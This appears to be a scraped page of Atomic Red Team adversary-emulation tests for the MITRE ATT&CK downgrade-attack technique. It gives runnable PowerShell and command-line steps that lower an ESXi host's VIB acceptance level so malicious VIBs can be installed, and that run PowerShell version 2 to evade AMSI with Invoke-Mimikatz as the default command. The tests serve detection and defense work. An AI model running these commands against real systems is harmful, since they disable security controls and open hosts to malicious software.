Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)
Atomic Test #1 - ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference
Supported Platforms: Linux
auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
| Name | Description | Type | Default Value | |——|————-|——|—————| | vm_host | Specify the host name of the ESXi Server | string | atomic.local| | vm_user | Specify the privilege user account on ESXi Server | string | root| | vm_pass | Specify the privilege user password on ESXi Server | string | pass|
1
powershell
1
2
3
4
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = "CommunitySupported"})
Disconnect-VIServer -Confirm:$false
1
powershell
1
2
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
1
Install-Module -Name VMware.PowerCLI -Confirm:$false
An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference
Supported Platforms: Windows
auto_generated_guid: 14d55b96-b2f5-428d-8fed-49dc4d9dd616
| Name | Description | Type | Default Value | |——|————-|——|—————| | vm_host | Specify the host name of the ESXi Server | string | atomic.local| | vm_user | Specify the privilege user account on ESXi Server | string | root| | vm_pass | Specify the privilege user password on ESXi Server | string | pass| | plink_file | Path to plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| | cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt|
1
command_prompt
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
1
powershell
1
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.
Supported Platforms: Windows
auto_generated_guid: 47c96489-2f55-4774-a6df-39faff428f6f
| Name | Description | Type | Default Value | |——|————-|——|—————| | v2_command | Specify the command to execute with Version 2 | string | Invoke-Mimikatz|
1
powershell
1
PowerShell -version 2 -command '#{v2_command}'
1
powershell
1
2
$v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
if (-not $v2_installed) {exit 1} else {exit 0}
1
echo "Manually install PowerShell Version 2"